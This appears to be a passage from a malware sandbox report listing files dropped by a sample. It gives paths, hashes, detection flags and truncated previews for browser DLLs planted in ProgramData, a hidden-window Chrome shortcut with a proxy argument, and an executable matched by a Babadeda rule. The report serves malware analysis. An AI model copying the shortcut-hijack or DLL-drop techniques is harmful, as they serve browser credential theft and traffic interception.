Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Desktop\Google Chrome.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:54 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.450785604084448
Encrypted:	false
SSDEEP:	48:8SGcl2dfTXd3RYrnvPdAKRkdAGdAKRFdAKRE:8SFlOw
MD5:	19A662A09DFC4BB82DAC779A623DB186
SHA1:	EFF317D7795E3DBEB7FA65192632D0F470DFCB0D
SHA-256:	FECD1F24E3F05857EC94E2E2E49D99C96096A6B9566435EB01ECC1B4699A2253
SHA-512:	BFA0C84FD4683A7E452DA6784AF4D5CAD31B0B8E4FA4E774FE17E1F0DE5A0AF808AA5E6E8A594E9E4299DE7F51EEC104FF1BCF5A2A96E74EABC12AC168E4FE99
Malicious:	false
Preview:	L..................F.@.. ......,.....Cwm.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\1000003002\ead6a72944.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91648
Entropy (8bit):	6.754699319115407
Encrypted:	false
SSDEEP:	1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfhxiJDe/Oq:Hq6+ouCpk2mpcWJ0r+QNTBfhAhe9
MD5:	5C88DA04EC807C26F6DB500EEB8D983B
SHA1:	DE7CE2AE49182E1C72CAFCA64826569568F3C667
SHA-256:	176F9E2C3645A8742F839B19A56B2DB258C9516D77423A33126266D11AC235EA
SHA-512:	0F8D07D241CC2FFF02E9DB777AE81A28A5C2A4581C431B9B36BCED6A5B563CF40BAA1473319B3F52CA2747E7B87546EF1FE637C99133CB58B0E01FF0CCEAED9C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\1000003002\ead6a72944.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....V...............0....@.........................................................................\|q......................................................................................pt..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3...0...4..................@..@.data...,....p.......D..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\buildred.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
MD5:	0B2E58EF6402AD69025B36C36D16B67F
SHA1:	5ECC642327EF5E6A54B7918A4BD7B46A512BF926
SHA-256:	4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
SHA-512:	1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5aaf1d3f-b406-43c2-9eb8-f5a09597f5a4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45503
Entropy (8bit):	6.093902446986258
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9I19ThDO6vP6OyBaTLjXFtcGoup1Xl3jVzXr4CCAo4:b/Ps+wsI7yO9Ic6lchu3VlXr4CRo4
MD5:	97E3CAF4E52B3FC6153457D2C72C1029
SHA1:	AE91425F506B7AB2CA3F1D3B97F78CF22DCAB3A9
SHA-256:	52800E10B8BDC4B66CEED673F54395DCD35541DD05A7C054E4ADFDF932F9A391
SHA-512:	52F7B98BD74AB30F5A68CD8BADDA07BB235BB402AA3F3C013B3EF3E8210FC28A19DF7396381E009E8F81D0E18241CDFE707E53012BDA10DC02BE9AD68DB0B6BA
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\64179981-6bfb-48dc-9f32-6a048321eb61.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44652
Entropy (8bit):	6.0965460547324355
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkBawuahDO6vP6OyBaTLjXFtcGoup1Xl3jVzXr4CCAg:z/Ps+wsI7yOEI6lchu3VlXr4CRo1
MD5:	ED4C0C4F991871A12D96554C3A6A0819
SHA1:	33D7D2333A479ABB7F1E285A308F0AF8126DC973
SHA-256:	18AEF06ED8C8853344ED3C937721CE9E3206897E5DF1D655BDDF791374D4A1EB
SHA-512:	0ACD5689BCEDD48855A702C418EB62B2A2561B9C8264B6A5CB6DDF03018F4EE30561C09A56C88B85D96ED80C1E8DCBA8C72DE84BED35E292CE84C067E6CC34F4
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9ed43527-0b4c-427d-9ffa-121a3f44787a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090733597544953
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBM1wuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEN6/tbz8hu3VlXr4CRo1
MD5:	472F9428CBA06B5B94B5AA1EF68BCA3E
SHA1:	23B009448E5AE52B7AD4ADDE292C0815098901F3
SHA-256:	C2B0B0D02E8225ABF76B72EB7804C50E13F513BD7CF74B9572C3C0D1C19DE17B
SHA-512:	155AF22D3E6B2D8E667BA00431AA3629092B7AB1806F263C74C4B9271CB259966A3483C4C1D13AAF791A89026DF6A1CA37D61CFA4F7EA602F2B0933E6FB120DB
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-66A3C758-1D20.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.3308356032470644
Encrypted:	false
SSDEEP:	3072:LLflLMDZJ3NSIB4idzrtEg1HFNyf+tupcl282:nlLG8I+iJrtEaHjyWw02
MD5:	2FB17A7F6CDC06E1BDB7B3DB2AE72951
SHA1:	4688683CE02895D1D336AF7803FD5B8ECA99F1DB
SHA-256:	FBC66CA88F6C60E63912CABE715EE33514F9309AB00C14A925E45EB42F043D05
SHA-512:	E645F037DBE615D36C06A205C2696717BF6AE035915AB5A0DB43A2AD059C1942BCF1391302A535A99006AF2B719FB8CAB8338FFB139B91C230A0EF030F47ADEA
Malicious:	false
Preview:	...@..@...@.....C.].....@..................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".seerwg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K..>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.............. .2......._.....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.132041621771752
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:	845CFA59D6B52BD2E8C24AC83A335C66
SHA1:	6882BB1CE71EB14CEF73413EFC591ACF84C63C75
SHA-256:	29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
SHA-512:	8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
Malicious:	false
Preview:	sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\00e822c6-f297-4142-bfcf-efa7729e488a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\47d27e8d-6e3c-4dcf-9767-c5c8f3ddc3f0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9783
Entropy (8bit):	5.114970239683246
Encrypted:	false
SSDEEP:	192:stGTkdCsSoAsZihUkaw3F8nbV+Fi4QA66W8YaFIMY+PaYJ:stGTpsSoAfhYbGxQx6W7aTYE
MD5:	8C91769AE57BB46BFBA37F236D50C758
SHA1:	F5B524B67D69C576E08DAF44DF871120A2538BD4
SHA-256:	6EC7EDB6B8B9E434831FE93E3C80699D63104A39DF8F3231418C3B2DF4A20488
SHA-512:	C8AC1CA72C0788E4E714C1B7F0E23BC4674CDF9E0860BC0B49162F4FEB1BDA0F16C9231DB73335E9159C91D973BB8C15FCB494B6194273BF3076E91548095116
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366483033032912","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5fd672f4-d76d-492e-9c0e-697a213dd316.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\66d0befe-353a-4da5-bf98-2d7f6a81583b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24853
Entropy (8bit):	5.565628942644612
Encrypted:	false
SSDEEP:	768:guxAKRWPXLfnG8F1+UoAYDCx9Tuqh0VfUC9xbog/OVZQ9MGrw7gp9tun:guxAKRWPXLfnGu1jaUWMD+tI
MD5:	58E5C81E95EB594E4470A44A7323153E
SHA1:	1A52AE63EADB8DD814ACC8BEFD60AB3B247934AF
SHA-256:	086FEA417DB232AB402224ED4BF4B1D8DAC2E79BE637EC35865B6201061B3FE9
SHA-512:	2407E4288F619C3C10CD3EDF0F2C616E406EB2C54CB27E73B4C2FE03A4B610053AA85C7572141D1CDBA367F10C3653694759287B860B6A417FC0F650965E3F82
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13366483032468145","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13366483032468145","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.1648972244923765
Encrypted:	false
SSDEEP:	6:BMcoDVq2P923oH+TcwtnG2tMsIFUt84Mc9gZmw+4Mc9IkwO923oH+TcwtnG2tMsd:Zohv4Yebn9GFUt8sa/+sm5LYebn95J
MD5:	AEB7DBE04A4CBFF8D807463C59B8A34C
SHA1:	C178E932950122ACA5030DCD10763B087D3265EE
SHA-256:	A08D2BDA969094D49ABB9736E926331727599DABC5B6A0076D065D25750FCD3F
SHA-512:	06F3CC7FA277819AA10D1F8A7F8824558FC48480941BF15C929773BA3A565BCF0972DF7AA88C36EB0926E29E2D00A48546FA5E43F5DD272FF2728316A930A237
Malicious:	false
Preview:	2024/07/26-11:57:12.511 1de0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/07/26-11:57:12.512 1de0 Recovering log #3.2024/07/26-11:57:12.512 1de0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.1648972244923765
Encrypted:	false
SSDEEP:	6:BMcoDVq2P923oH+TcwtnG2tMsIFUt84Mc9gZmw+4Mc9IkwO923oH+TcwtnG2tMsd:Zohv4Yebn9GFUt8sa/+sm5LYebn95J
MD5:	AEB7DBE04A4CBFF8D807463C59B8A34C
SHA1:	C178E932950122ACA5030DCD10763B087D3265EE
SHA-256:	A08D2BDA969094D49ABB9736E926331727599DABC5B6A0076D065D25750FCD3F
SHA-512:	06F3CC7FA277819AA10D1F8A7F8824558FC48480941BF15C929773BA3A565BCF0972DF7AA88C36EB0926E29E2D00A48546FA5E43F5DD272FF2728316A930A237
Malicious:	false
